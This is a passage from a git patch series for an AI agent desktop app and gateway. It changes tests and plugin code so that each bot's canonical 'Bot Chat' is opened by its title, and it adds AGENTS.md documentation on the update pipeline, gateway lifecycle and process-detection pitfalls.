bot-building + * history behind a row that previewed one session and opened another. * - * The pin still owns plumbing (creation, hide sweep, DM delivery); it just - * must not override a newer real conversation. + * The original complaint has a non-destructive answer: scratch sessions from + * "New chat with this agent" are not plumbing-titled, so the hide sweep leaves + * them visible in the Sessions sidebar. They are reachable there; they are + * simply not what the bot row targets. + * + * Documented contract (docs/user-guide/bot-mode): "Click a Bot to land in its + * chat — every Bot has a canonical, persistent Bot Chat conversation that is + * created (and pinned) the moment the Bot is born." */ function loadOpenPath({ openSession, request }) { const start = source.indexOf('const canonicalCreations = new Map()') @@ -68,18 +78,20 @@ const healthyPin = return {} } -test('bot row opens the NEWER real conversation instead of the pinned chat', async () => { +test('a healthy pin wins over a newer conversation — the row lands in the Bot Chat', async () => { const runtime = loadOpenPath({ openSession: async () => undefined, request: healthyPin() }) // The roster's freshest visible session is a real conversation the user - // started after the pin was made. + // started after the pin was made. It must NOT displace the forever-chat: + // the pinned chat is hidden from Sessions, so the row is its only door, + // while this newer session remains reachable in the Sessions sidebar. const history = { id: 'new-chat', title: '릴시아 카피 회의', message_count: 12, last_active: 9000 } const result = await runtime.openBotCanonicalChat('plan', 'pinned-bot-chat', history, history) - assert.equal(result, 'new-chat', 'should return the newer conversation') + assert.equal(result, 'pinned-bot-chat', 'should return the pinned Bot Chat') assert.equal(runtime.opened.length, 1) - assert.equal(runtime.opened[0].id, 'new-chat', 'must not reopen the pinned transcript') + assert.equal(runtime.opened[0].id, 'pinned-bot-chat', 'must open the pinned forever-chat') assert.equal(runtime.opened[0].options.profile, 'plan') assert.equal( runtime.opened[0].options.keepAllProfilesScope, @@ -89,25 +101,41 @@ test('bot row opens the NEWER real conversation instead of the pinned chat', asy }) /** - * The REAL call shape from the roster row — this is what the first fix got - * wrong. `previewSession` is `bot.preferred_session || last`, so on a pinned - * bot it resolves to the PIN (preview identity must match click identity). - * Feeding that as the "newer" candidate made the whole preference dead code: - * it always saw the pin and short-circuited on "same id", and the user still - * got the old session back ("다른 봇 눌렀다가 다시 그 봇 누르면 그 전 세션 열림"). - * The freshest visible session has to arrive as its own argument. + * The REAL call shape from the roster row: `previewSession` is + * `bot.preferred_session || last`, so on a pinned bot it resolves to the PIN. + * Preview identity and click identity are the same session by construction + * (#88200) — which is exactly the property the reverted newer-session + * preference broke. */ -test('real roster call: previewSession is the pin, latest arrives separately', async () => { +test('real roster call: preview identity and click identity are the same session', async () => { const runtime = loadOpenPath({ openSession: async () => undefined, request: healthyPin('pin-1') }) const pinnedPreview = { id: 'pin-1', title: 'Bot Chat', preview: 'plumbing' } - const last = { id: 'user-newest', title: '오늘 기획 회의', message_count: 8, last_active: 9999 } - // Mirrors: openBotCanonicalChat(bot.name, pinnedChat, previewSession, last) - const result = await runtime.openBotCanonicalChat('plan', 'pin-1', pinnedPreview, last) + // Mirrors: openBotCanonicalChat(bot.name, pinnedChat, previewSession) + const result = await runtime.openBotCanonicalChat('plan', 'pin-1', pinnedPreview) - assert.equal(result, 'user-newest', 'must open the newest real conversation, not the pin') - assert.equal(runtime.opened[0].id, 'user-newest') + assert.equal(result, 'pin-1', 'must open the pinned Bot Chat the row previewed') + assert.equal(runtime.opened[0].id, 'pin-1') +}) + +/** Regression guard for the revert: the open path must not consult the + * newer-visible-session predicate while the pin is alive. Bot Chats are + * hidden from Sessions, so a row that prefers a newer session strands the + * forever-chat with no reachable entry point. */ +test('the healthy-pin branch never prefers a newer visible session', () => { + const start = source.indexOf('if (preferred && isCanonicalBotChatHistory(preferred)) {') + const end = source.indexOf('if (preferred) {', start) + + assert.notEqual(start, -1, 'healthy-pin branch is missing') + + const branch = source.slice(start, end) + + assert.equal( + branch.includes('newerVisibleBotChat('), + false, + 'a healthy pin must be opened directly — no newer-session preference' + ) }) test('the canonical Bot Chat itself never counts as "newer" (it IS the pin)', () => { @@ -203,25 +231,26 @@ test('the post-kickoff retry open also follows the bot', async () => { ) }) -test('a failed open of the newer session falls back to the pin (row never dies)', async () => { +/** With the newer-session preference gone there is no "try the newer chat, + * fall back to the pin" dance: a verified pin is opened directly, and a + * failed open of a JUST-verified session is transient (reconnect, backend + * restart), so it propagates rather than forking the forever-chat. */ +test('a failed open of a verified pin surfaces instead of forking the chat', async () => { const runtime = loadOpenPath({ - openSession: async id => { - if (id === 'deleted-chat') { - throw new Error('session not found') - } - - return undefined + openSession: async () => { + throw new Error('session not found') }, request: healthyPin('pin-1') }) - const history = { id: 'deleted-chat', title: '지워진 대화', message_count: 3 } + await assert.rejects( + () => runtime.openBotCanonicalChat('ops', 'pin-1', { id: 'pin-1', title: 'Bot Chat' }), + /session not found/ + ) - const result = await runtime.openBotCanonicalChat('ops', 'pin-1', history) - - const ids = runtime.opened.map(entry => entry.id) - - assert.ok(ids.includes('deleted-chat'), 'tries the newer session first') - assert.ok(ids.includes('pin-1'), 'falls back to the verified pin') - assert.equal(result, 'pin-1', 'row resolves to the pin rather than failing') + assert.deepEqual( + runtime.saved, + [], + 'a transient failure must not clear the pin or mint a replacement' + ) }) From 4ba038b51d2569ec3b9563b2ccdf42c489f3ba08 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Sat, 22 Aug 2026 00:18:58 -0700 Subject: [PATCH 121/161] docs(agents-md): update pipeline architecture, process-identity pitfall, gateway lifecycle contract, wine2e lane MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Captures the durable invariants from the fleet-update campaign (#91277) so contributors and the sweeper review against them: - Update Pipeline section: the transactional shape now on main (plan → snapshot → apply → restart-per-kind → verify → report), the per-stage invariants (no partial snapshot tiers, ZIP only on real git failure + dirty-tree refusal + release-dir graft, fleet-wide drain-first restarts, code-sha verify, exactly-once receipts), deployment kinds as first-class, and the #92091 socket direction. - Gateway lifecycle vs Desktop app: serve dies with the app by design, the detached gateway survives it; the Windows shim-unlock tree-kill is the known breach (#85265) and its replacement is pause-for-update — with the two anti-fix warnings. - Known Pitfall: process identity is never inferred from argv substrings (canonical matchers, parser-derived flag sets, ancestor carve-out, full-cmdline rule, socket-first for new heuristics). - Testing: the on-demand wine2e live Windows lane and its reproduce-first workflow. --- AGENTS.md | 110 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 110 insertions(+) diff --git a/AGENTS.md b/AGENTS.md index 93705624e3..b951e238fa 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -1201,6 +1201,79 @@ Full user-facing docs: `website/docs/user-guide/features/kanban.md`. --- +## Update Pipeline (`hermes update`) + +The updater is transactional in shape (fleet-update campaign, #91277 — +Aug 2026). Every stage exists because its absence was a real field +failure; PRs that weaken a stage need to answer for the failure class it +guards: + +``` +plan → snapshot → apply → restart-per-kind → verify → report +``` + +- **Plan** (`hermes_cli/update_inventory.py`, `hermes update --plan`): + read-only inventory — install kind, all profiles, every live gateway + with supervisor + running code version. Deployment kinds are + first-class: `git` updates in place; `docker`/`nix`/`apt` are NOT + in-place-updatable and the updater reports the correct external + command instead of fighting the deployment model. +- **Snapshot** (`hermes_cli/backup.py`): pre-update quick snapshot for + EVERY profile (the code swap + fleet restart touch all of them), each + into its own `state-snapshots/`, identical file set + 1 GiB per-file + cap + keep=1. **Never add a partial/tiered snapshot set** — mixed + coverage creates torn-restore states across schema generations. Quick + snapshots are FILE-LOSS RECOVERY (the per-profile cron-jobs safety + net restores from them), NOT code-rollback insurance; `--backup` full + mode owns rollback. +- **Apply**: git pull, or the Windows ZIP fallback — which fires ONLY + when git itself failed (`_should_zip_fallback_on_update_error`, + argv-classified; a dependency-install failure must never trigger a + tree-clobbering re-download), REFUSES a dirty working tree + (`-uall`, plus a pre-swap TOCTOU re-check), and grafts the live + `apps/desktop/release/` into the staged swap (the GitHub source ZIP + has no built desktop app; without the graft the swap deletes it). +- **Restart-per-kind**: systemd and launchd restarts are FLEET-WIDE + (every `hermes-gateway*` unit / `ai.hermes.gateway*` LaunchAgent), + drain-first (SIGUSR1) with per-unit/per-label failure isolation. + Restarting only the invoking profile's service leaves siblings on + stale `sys.modules` until they crash — the largest dupe-PR cluster in + the repo's history came from that bug. +- **Verify**: gateways stamp their running `code_sha`/`code_version` + into `gateway_state.json` on every runtime-status write + (`gateway/status.py`); after the restart phase the updater compares + each live gateway against the fresh checkout and prints a fleet + version matrix. A provably-stale gateway fails the update (exit 1) — + automation must never treat a mixed-version fleet as healthy. +- **Report**: every run writes a machine-readable receipt to + `~/.hermes/logs/update_receipts/` (`latest.json` pointer; steps, + skips WITH reasons, restart outcome, plan, fleet snapshot). + Finalization is owned by the `cmd_update` command boundary — early + `sys.exit` paths (preflight refusals, fetch failures) still persist + a receipt with the real exit code. A begun-but-unwritten receipt is + a bug: the refused/failed runs are the ones receipts exist for. + +Architecture direction: process-scan-based coordination between the +updater, serve/dashboard, and the gateway is being replaced by a +gateway-owned control socket (#92091). Do not add new scan heuristics +without checking that design; scans are the fallback layer. + +### Gateway lifecycle vs. the Desktop app + +`hermes serve` (control plane, desktop-spawned child) dies with the app +— by design. The messaging gateway (`gateway run`) SURVIVES the app: the +serve backend's `/api/gateway/*` endpoints spawn it detached +(`_spawn_hermes_action` — `start_new_session` / `DETACHED_PROCESS`), so +`before-quit`'s backend SIGTERM never reaches it. Bots keep running +when the user closes the app. The known breach of this contract is the +Windows shim-unlock teardown (`taskkill /T /F` on venv-shim holders, +#85265) — it exists to let updates proceed, and its replacement is +#92091's `pause-for-update`. Do not "fix" gateway-dies-with-app reports +by re-parenting the gateway under the backend, and do not "fix" update +locks by widening the tree-kill. + +--- + ## Important Policies ### Prompt Caching Must Not Break @@ -1314,6 +1387,27 @@ automatically scope to the active profile. ## Known Pitfalls +### DO NOT infer process identity from argv substrings +The bug class behind ~10 fleet-update issues (#90778, #87594, #78089, +#76129, #91964, ...): classifying a process by `"serve" in cmdline` or +similar. `kanban --preserve-cache` contains "serve"; a flag VALUE can +equal a subcommand (`-m dashboard serve`); truncated cmdlines hide the +real subcommand. Rules: +- Use the canonical matchers: `gateway.status.looks_like_gateway_command_line` + (gateway run), `hermes_cli.update_cmd._hermes_holder_subcommand` + (top-level subcommand of any Hermes argv). Never hand-roll token scans. +- Flag sets must be DERIVED from the parser + (`_holder_value_flags()` introspects `build_top_level_parser()`), never + hand-written lists — they drift. +- Never blanket-exclude ancestors from process scans: when `/update` runs + as the gateway's child, a gateway ancestor must stay visible to the + pause machinery (#87594). Exclude interactive ancestry, carve out + gateway-shaped ancestors. +- Match on FULL cmdlines; truncate only at display time (#78089). +- Before adding any new scan heuristic, read #92091 — the gateway control + socket replaces scans as the primary coordination mechanism; scans are + the fallback layer for old/crashed processes. + ### DO NOT hardcode `~/.hermes` paths Use `get_hermes_home()` from `hermes_constants` for code paths. Use `display_hermes_home()` for user-facing print/log messages. Hardcoding `~/.hermes` breaks profiles — each profile @@ -1491,6 +1585,22 @@ in order to pass, it belongs on that OS.** When one test body walks several platforms in sequence, split it. Keep the host-native arm on the Linux lane and move the other arm into its own marked test. +**Live Windows process-topology E2E: the `wine2e` lane.** For claims about +real Windows process behavior that mocks cannot reproduce (venv-holder +scans, process-tree parentage, launcher/worker chains, detach semantics), +there is an on-demand workflow `windows-venv-e2e.yml` that runs +`tests/hermes_cli/test_venv_holder_windows_live.py` on a real +`windows-latest` runner — spawning actual processes and driving the real +detection code, no mocked psutil. It fires ONLY on pushes to `wine2e/**` +branches (inert on PRs and main; costs nothing on normal work). The proven +workflow: write probes that pin CORRECT behavior, push to a `wine2e/` +branch to reproduce the bugs live on unfixed code, build the fix, iterate +until the lane is green, then open the PR — the live receipt on the exact +head is the Windows proof reviewers ask for. Extend the live suite when +touching that subsystem; assert against the gateway ANCESTOR found by +argv, not the direct parent (the venv shim makes every spawn a +launcher/worker chain). + **Use the marker, never a bare `skipif`.** `scripts/ci/list_os_marked_tests.py` decides which files the macOS/Windows lanes import by grepping for the marker *name*, and the lane then filters with `-m `. A test gated with From a9860d413dadbde51a7d0691caa99e191bea36be Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Sat, 22 Aug 2026 01:04:43 -0700 Subject: [PATCH 122/161] =?UTF-8?q?fix(bot-mode):=20the=20canonical=20Bot?= =?UTF-8?q?=20Chat=20is=20found=20by=20NAME=20=E2=80=94=20session-id=20pin?= =?UTF-8?q?s=20removed?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit A bot's forever-chat now has exactly one identity: the session titled "Bot Chat" on that bot's profile. Core UNIQUE(title) makes (profile, 'Bot Chat') an exact registry, and every open consults it directly via session.list {title, include_hidden}. The stored-id pin (ui_meta['hermes-bots'].chat) and its entire verification apparatus — preferred_session_ids resolution, drifted-pin keep branches, last_session grandfathering, dead-pin recovery re-anchoring, newerVisibleBotChat — are removed, not deprecated. Legacy ui_meta.chat keys are ignored and dropped from merges on sight. Every lost-canonical-chat incident (#88146, #88200, #90524, #90705, and five hardening waves) traced to that pointer dangling or being stolen, then later guards welding the wrong session in. A name cannot dangle: corrupt pins self-heal on first click because the pointer is simply never read. Gateway: profiles.list now reports canonical_session per profile row (registry row resolved server-side by title — hidden rows resolve, deny-listed sources and archived rows do not, compression lineages resolve to the live tip), replacing the preferred_session_ids request contract. The roster preview, activity signals, and the /new→/compact guard all read canonical_session, so preview identity and click identity are the same row by construction. No migration shims: this IS the system. --- .../desktop/src/plugins/hermes-bots/plugin.js | 434 ++++-------------- .../tests/active-now-strip.test.mjs | 15 +- .../tests/activity-toasts.test.mjs | 4 +- .../bot-row-opens-canonical-chat.test.mjs | 256 ----------- .../canonical-chat-adopt-before-mint.test.mjs | 155 ------- .../tests/canonical-chat-creation.test.mjs | 12 +- .../canonical-chat-empty-recovery.test.mjs | 117 ----- .../tests/canonical-chat-identity.test.mjs | 417 ----------------- .../tests/canonical-chat-pin.test.mjs | 86 ---- .../tests/canonical-chat-registry.test.mjs | 177 +++++++ .../hermes-bots/tests/hide-bot-chats.test.mjs | 56 +-- .../tests/new-compact-guard.test.mjs | 23 +- .../hermes-bots/tests/roster-preview.test.mjs | 2 +- .../test_profiles_list_canonical_session.py | 189 ++++++++ .../test_profiles_list_preferred_session.py | 211 --------- tui_gateway/methods_profiles.py | 40 +- tui_gateway/methods_session.py | 2 +- 17 files changed, 525 insertions(+), 1671 deletions(-) delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-adopt-before-mint.test.mjs delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-empty-recovery.test.mjs delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-pin.test.mjs create mode 100644 apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-registry.test.mjs create mode 100644 tests/tui_gateway/test_profiles_list_canonical_session.py delete mode 100644 tests/tui_gateway/test_profiles_list_preferred_session.py diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index 2b6bc62eb8..2aacbe5be9 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -1276,57 +1276,22 @@ function fallbackSelectionAfterHide(name) { /** One-time reconciliation: Bot Mode sessions are always hidden, but rooms * and Bot Chats created before this policy (or while the old pref was off) - * left visible rows behind. On every plugin load, sweep every session id we - * own — canonical chats from bot meta plus each group room's member - * sessions — through the core session.set_hidden RPC, then run the - * ownership-based sweep for the rows we DON'T know by id. Idempotent (the DB - * setter is a no-op on already-hidden rows) and feature-detected: older - * gateways lack session.set_hidden and simply keep the rows visible. */ + * left visible rows behind. On every plugin load, sweep the session ids we + * own by id (each group room's member sessions) through the core + * session.set_hidden RPC, then run the TITLE-based ownership sweep for + * everything else — canonical Bot Chats are identified by name (the + * registry row titled "Bot Chat"), so the title sweep is what hides them; + * no stored-id pointer is consulted. Idempotent (the DB setter is a no-op + * on already-hidden rows) and feature-detected: older gateways lack + * session.set_hidden and simply keep the rows visible. */ function hideOwnedBotSessions() { - const canonical = Object.entries($botMeta.get()) - .map(([name, meta]) => ({ name, id: meta && meta.chat })) - .filter(entry => Boolean(entry.id)) const rooms = Object.values($groupChats.get()) .flatMap(room => Object.values(room?.sessions || {})) .filter(sid => Boolean(sid) && sid !== true) - // A stale local/server pointer must not be trusted merely because it looks - // like a session id. Resolve every canonical pointer through the backend and - // require the canonical Bot Chat title before the hide write. This is - // deliberately fail-closed: an unavailable/old gateway may leave an old - // Bot Chat visible, but it must never hide an unrelated user conversation. - const verifiedCanonical = Promise.resolve() - .then(() => - host.request('profiles.list', { - include_sessions: true, - preferred_session_ids: Object.fromEntries(canonical.map(entry => [entry.name, entry.id])) - }) - ) - .then(res => { - const profiles = Array.isArray(res?.profiles) ? res.profiles : [] - const valid = [] - - for (const entry of canonical) { - const profile = profiles.find(item => item?.name === entry.name) - const preferred = profile?.preferred_session - const ids = [preferred?.id, preferred?.resolved_id, preferred?.session_id, preferred?.session_key] - .filter(Boolean) - .map(String) - - if (String(preferred?.title || '').trim() === 'Bot Chat' && ids.includes(String(entry.id))) { - valid.push(entry.id) - } - } - - return valid - }) - .catch(() => []) - - const known = verifiedCanonical.then(validCanonical => - Promise.all( - [...new Set([...validCanonical, ...rooms])].map(sid => - Promise.resolve(host.request('session.set_hidden', { session_id: sid, hidden: true })).catch(() => undefined) - ) + const known = Promise.all( + [...new Set(rooms)].map(sid => + Promise.resolve(host.request('session.set_hidden', { session_id: sid, hidden: true })).catch(() => undefined) ) ) @@ -1573,15 +1538,10 @@ function mergeServerMeta(roster, fetchedAt = 0) { merged.image = mine.image } - // Server metadata is authoritative for the canonical chat pointer. - // Without this deletion sync, ctx.storage resurrects stale sessions - // after the server pin is cleared and even after a full app restart. - if ( - Object.prototype.hasOwnProperty.call(mine, 'chat') && - !Object.prototype.hasOwnProperty.call(server, 'chat') - ) { - delete merged.chat - } + // Legacy canonical-chat pointers (meta.chat) are dead: identity is the + // profile's "Bot Chat" registry row, resolved by name. Drop the key on + // sight so old ui_meta can never look meaningful again. + delete merged.chat // Canonical multi-group metadata is authoritative for the compatibility // scalar too. A server-side `group: null` is represented by omission, @@ -3592,21 +3552,6 @@ function PetTab({ image, onImage }) { * Gates every SOUL.md protocol append below. */ let serverInjectsProtocol = false -/** Pins to resolve precisely on the next roster poll: {profile: chatId}. - * The backend answers "what about THIS conversation" per entry - * (preferred_session), so a row's preview can describe the same session its - * click opens (hermes-agent#88200). Unknown params are ignored by older - * gateways, which simply omit the field. */ -function preferredSessionIds(allMeta) { - const pins = {} - for (const [name, meta] of Object.entries(allMeta || {})) { - if (meta?.chat) { - pins[name] = meta.chat - } - } - return pins -} - function useRoster() { const activeConnectionId = useValue(host.state.connectionId) @@ -3618,13 +3563,11 @@ function useRoster() { // a write can only carry pre-write ui_meta. (Issue time is the // conservative bound — the server answered no earlier than this.) const issuedAt = Date.now() - // Rich rows (last_session, ui_meta, has_avatar) come from the ACTIVE - // gateway's profiles.list — unchanged single-source behavior. - const pins = preferredSessionIds($botMeta.get()) - const local = await host.request( - 'profiles.list', - Object.keys(pins).length ? { preferred_session_ids: pins } : {} - ) + // Rich rows (last_session, canonical_session, ui_meta, has_avatar) + // come from the ACTIVE gateway's profiles.list — the canonical Bot + // Chat is resolved server-side by NAME (the "Bot Chat" registry row), + // so the roster never sends session pointers. + const local = await host.request('profiles.list', {}) // Newer backends inject the teammate-messaging protocol into every // session's system prompt (agent.bot_mode_protocol) — SOUL.md must not // carry a second copy. Older gateways lack the flag: keep appending. @@ -4079,18 +4022,14 @@ function showsHandle(name, meta, bot) { } // ── canonical bot chat ─────────────────────────────────────────────────────── -// Each bot has ONE forever chat, pinned by stored-session id in bot meta -// (meta.chat — synced server-side via ui_meta, so it follows the profile). -// Opening a bot ALWAYS lands there: never "most recent session", which -// drifts whenever the profile is used from the CLI, Sessions mode, or a -// cronjob. The pin only changes through explicit adoption: -// - grandfather: first open of a bot that already has history pins its -// current latest session, so continuity starts from the chat in use -// - fresh bot: opens a draft; when the first message persists a stored -// session, we adopt that id (empty sessions are pruned server-side, so -// pre-creating one at enable time is not possible) -// - recovery: if the pinned id vanishes from the DB (compaction rewrote -// the lineage), re-pin the newest session carrying the canonical title. +// Each bot has ONE forever chat, identified by NAME, never by pointer: the +// session titled exactly "Bot Chat" on that bot's profile. The core +// UNIQUE(title) index makes (profile, "Bot Chat") an exact registry, so every +// open consults that registry directly — there is nothing to verify, re-pin, +// grandfather, or recover. Stored-id pins (ui_meta['hermes-bots'].chat) were +// the previous identity and are REMOVED: every lost-chat incident traced to a +// dangled or stolen pointer that later guards then welded in. Legacy +// ui_meta.chat keys are simply ignored. // In-flight creations, keyed by bot name — double-clicking a row must not // mint two canonical chats. @@ -4101,6 +4040,10 @@ const canonicalCreations = new Map() const PROFILE_SESSION_LIST_LIMIT = 200 let botOpenGeneration = 0 +/** The one canonical title. (profile, CANONICAL_CHAT_TITLE) IS the bot's + * forever-chat identity — see the header above. */ +const CANONICAL_CHAT_TITLE = 'Bot Chat' + async function openStoredBotChat(name, storedId, summary) { if (!storedId || typeof host.openSession !== 'function') { throw new Error('This Hermes Desktop version cannot open stored sessions') @@ -4137,27 +4080,26 @@ async function openStoredBotChat(name, storedId, summary) { return storedId } -/** Adopt-before-mint: the profile may already own a canonical Bot Chat that - * the pin lost track of (pin cleared during an outage, ui_meta rolled back, - * a fork squatting the title). The core UNIQUE title index guarantees at - * most ONE session titled "Bot Chat" per profile db — Profile → Named - * Session is an exact registry, so consult it exactly: `title` asks the - * gateway for an indexed WHERE title = ? lookup (window-free; a busy - * profile can push the forever-chat past any recency window, which would - * re-open the fork loop with a higher trigger threshold). Minting while a - * "Bot Chat" row exists is always wrong twice over: it forks the - * forever-chat AND the new row can never take the (already held) canonical - * title, so the next identity check misreads it and forks again — the - * infinite-fork loop. An older gateway ignores the unknown `title` param - * and returns the plain windowed listing instead — the pre-exact-lookup - * behavior — so the local scan below stays as the compatibility rung. - * include_hidden is required (canonical chats are always hidden); a gateway - * without it simply finds nothing and we fall through to mint. */ +/** True when a session summary IS the canonical registry row. root_title is + * the durable lineage-root title reported by exact-lookup gateways; plain + * title covers windowed listings. */ +function isCanonicalBotChatHistory(history) { + const rootTitle = String(history?.root_title || '').trim() + const title = String(history?.title || '').trim() + return rootTitle === CANONICAL_CHAT_TITLE || (!rootTitle && title === CANONICAL_CHAT_TITLE) +} + +/** THE identity lookup: the profile's session titled exactly "Bot Chat". + * The core UNIQUE title index guarantees at most ONE such row per profile + * db — Profile → Named Session is an exact registry, so consult it exactly: + * `title` asks the gateway for an indexed WHERE title = ? lookup + * (window-free; a busy profile can push the forever-chat past any recency + * window). include_hidden is required (canonical chats are always hidden). */ async function findExistingCanonicalChat(name) { try { const res = await host.request('session.list', { profile: name, - title: 'Bot Chat', + title: CANONICAL_CHAT_TITLE, limit: PROFILE_SESSION_LIST_LIMIT, include_hidden: true }) @@ -4168,11 +4110,13 @@ async function findExistingCanonicalChat(name) { } } -/** Create the bot's ONE forever chat: a real session opened with a kickoff - * message (the gateway prunes zero-message sessions, so the chat is born - * with the bot introducing itself). Pins the stored id in bot meta and - * returns it. Adopts an existing "Bot Chat" row instead of creating when - * the profile already has one (see findExistingCanonicalChat). */ +/** Create the bot's ONE forever chat: a real session titled "Bot Chat", + * opened with a kickoff message (the gateway prunes zero-message sessions, + * so the chat is born with the bot introducing itself). Adopts the existing + * "Bot Chat" row instead of creating when the profile already has one — + * minting while a "Bot Chat" row exists is always wrong twice over: it + * forks the forever-chat AND the new row can never take the (already held) + * canonical title. */ function createCanonicalChat(name) { const inflight = canonicalCreations.get(name) @@ -4184,12 +4128,9 @@ function createCanonicalChat(name) { const existing = await findExistingCanonicalChat(name) if (existing?.id) { - saveBotMeta(name, { chat: existing.id }) - if (typeof host.openSession === 'function') { // The exact-lookup gateway reports the compression-lineage tip as - // resolved_id; the pin stays the durable row id (same split the - // preferred_session path uses). + // resolved_id; open the tip, the registry row stays the identity. await openStoredBotChat(name, existing.resolved_id || existing.id, existing) } @@ -4198,7 +4139,7 @@ function createCanonicalChat(name) { const res = await host.request('session.create', { profile: name, - title: 'Bot Chat', + title: CANONICAL_CHAT_TITLE, // Always born hidden from the global sidebar — Bot Mode sessions are // plugin-owned. Core applies this via the generic `hidden` flag // (deferred as pending_hidden until the row exists); older gateways @@ -4208,10 +4149,6 @@ function createCanonicalChat(name) { const sid = res?.stored_session_id const runtime = res?.session_id - if (sid) { - saveBotMeta(name, { chat: sid }) - } - // Mount the session view FIRST, then send the kickoff — submitting into // an unmounted session left the intro reply invisible until reopen. let opened = false @@ -4236,8 +4173,8 @@ function createCanonicalChat(name) { await host.openSession(sid, { profile: name, intent: 'main', keepAllProfilesScope: false }) } } catch { - // The chat already exists. Keep the pin so the next click - // opens it instead of making a second Bot Chat. + // The chat already exists under the canonical title — the next click + // finds it by name instead of making a second Bot Chat. } } @@ -4249,187 +4186,25 @@ function createCanonicalChat(name) { return run } -/** Open the bot's ONE forever chat and return the opened id (or the pin). +/** Open the bot's ONE forever chat and return the opened registry id. * - * Identity rules (hermes-agent#88200 — the row must open the session its - * preview describes): - * - grandfather: no pin + an existing Bot Chat adopts the previewed session - * (`history`, the roster's last_session for this bot) instead of minting - * a new empty chat. Ordinary user conversations are never adopted; - * `last_session` is only a recency hint, not an ownership proof; - * - a live pin is verified through the backend's precise preferred_session - * resolver (hidden rows still resolve; compression lineages resolve to - * the live tip) — never inferred from a paginated, hidden-excluding - * session.list window, which misjudged real hidden pins as gone; - * - transient lookup failures keep the pin: try the stored id as-is, and - * only a rejected open enters recovery. */ -function isCanonicalBotChatHistory(history) { - const rootTitle = String(history?.root_title || '').trim() - const title = String(history?.title || '').trim() - return rootTitle === 'Bot Chat' || (!rootTitle && title === 'Bot Chat') -} + * The whole resolution is one registry consultation: the profile's session + * titled "Bot Chat" exists → open it (lineage tip); it doesn't → create it. + * No id pointer is read or written anywhere in this path. */ +async function openBotCanonicalChat(name) { + const existing = await findExistingCanonicalChat(name) -/** The bot's newest VISIBLE conversation when it should win over the pin, else - * null. - * - * RETAINED FOR THE DEAD-PIN RECOVERY PATH ONLY. This is deliberately NOT - * consulted while the pin is alive: Bot Mode's documented contract is "click - * a Bot to land in its chat — every Bot has a canonical, persistent Bot Chat - * conversation that is created (and pinned) the moment the Bot is born", and - * canonical Bot Chats are ALWAYS hidden from the Sessions sidebar - * (session.create passes hidden:true unconditionally — see - * hide-bot-chats.test.mjs). The bot row is therefore the ONLY door to the - * forever-chat; preferring a newer session here walls the relationship off - * behind a door that no longer leads to it. - * - * Guards, all of which matter: - * - the canonical Bot Chat itself is never "newer" (it IS the pin), so - * plumbing can't shadow itself; - * - an empty draft is skipped: clicking a bot right after a stray ⌘N would - * otherwise open a blank chat instead of the conversation; - * - identical ids mean the pin already points there — nothing to switch to. - * Returns the stored id so callers keep using the normal open path. */ -function newerVisibleBotChat(pinned, history) { - const id = history?.id - - if (!id || id === pinned || isCanonicalBotChatHistory(history)) { - return null + if (existing?.id && typeof host.openSession === 'function') { + await openStoredBotChat(name, existing.resolved_id || existing.id, existing) + return existing.id } - // `message_count` is absent on older gateways — treat unknown as real - // history rather than discarding a legitimate conversation. - const count = history?.message_count - - if (typeof count === 'number' && count <= 0) { - return null - } - - return id -} - -async function openBotCanonicalChat(name, pinned, history) { - if (!pinned) { - // Grandfather only an actual Bot Chat. `last_session` is merely the most - // recent row for the profile; adopting it blindly can claim an unrelated - // user conversation and the hide sweep would then hide that conversation. - const adoptId = isCanonicalBotChatHistory(history) ? history.id : null - if (adoptId && typeof host.openSession === 'function') { - await openStoredBotChat(name, adoptId, history) - saveBotMeta(name, { chat: adoptId }) - return adoptId - } - return createCanonicalChat(name) - } - - // Precise verification. An older gateway ignores the unknown param and - // omits the key — that reads as a lookup failure below, NOT as a missing - // session, so legacy backends keep the try-as-is escape hatch. - let preferred - let lookupFailed = false - try { - const res = await host.request('profiles.list', { - include_sessions: true, - preferred_session_ids: { [name]: pinned } - }) - const row = (res?.profiles ?? []).find(p => p.name === name) - preferred = row?.preferred_session - if (preferred === undefined) { - lookupFailed = true - } - } catch { - lookupFailed = true - } - - if (lookupFailed) { - // Transient gateway state (or an older backend): the pin is innocent - // until proven guilty — try it as-is. A rejected open is still ambiguous: - // it can be the same reconnect/hydration outage that broke this lookup, so - // preserve the forever-chat pin and surface Retry instead of forking it. - return openStoredBotChat(name, pinned, history) - } - - if (preferred && isCanonicalBotChatHistory(preferred)) { - // The pin is alive and healthy — open it. This is the whole contract: - // "Click a Bot to land in its chat — every Bot has a canonical, - // persistent Bot Chat conversation that is created (and pinned) the - // moment the Bot is born." - // - // A newer-visible-session preference used to sit here, so that a bot row - // landed on the user's most recent conversation instead of the pin. It - // was reverted (2026-08-22) because it is unsound given how Bot Mode - // stores these chats: canonical Bot Chats are ALWAYS hidden from the - // Sessions sidebar (session.create passes hidden:true unconditionally, - // and hideOwnedBotSessions sweeps any that were born visible). The bot - // row is therefore the ONLY door to the forever-chat, so preferring a - // newer session did not merely re-order two equal entry points — it made - // the pinned relationship unreachable from anywhere in the UI. Reported - // symptom: a bot's whole build history became invisible, while the row - // previewed one session and opened another. - // - // The bug that motivated the preference — "I start a new chat with a bot, - // click another bot, click back, and my new chat is gone" — has a - // non-destructive answer: scratch sessions started via "New chat with - // this agent" are NOT plumbing-titled, so the hide sweep leaves them in - // the Sessions sidebar. They are reachable there; they simply are not the - // bot row's target, which is by design. - try { - await 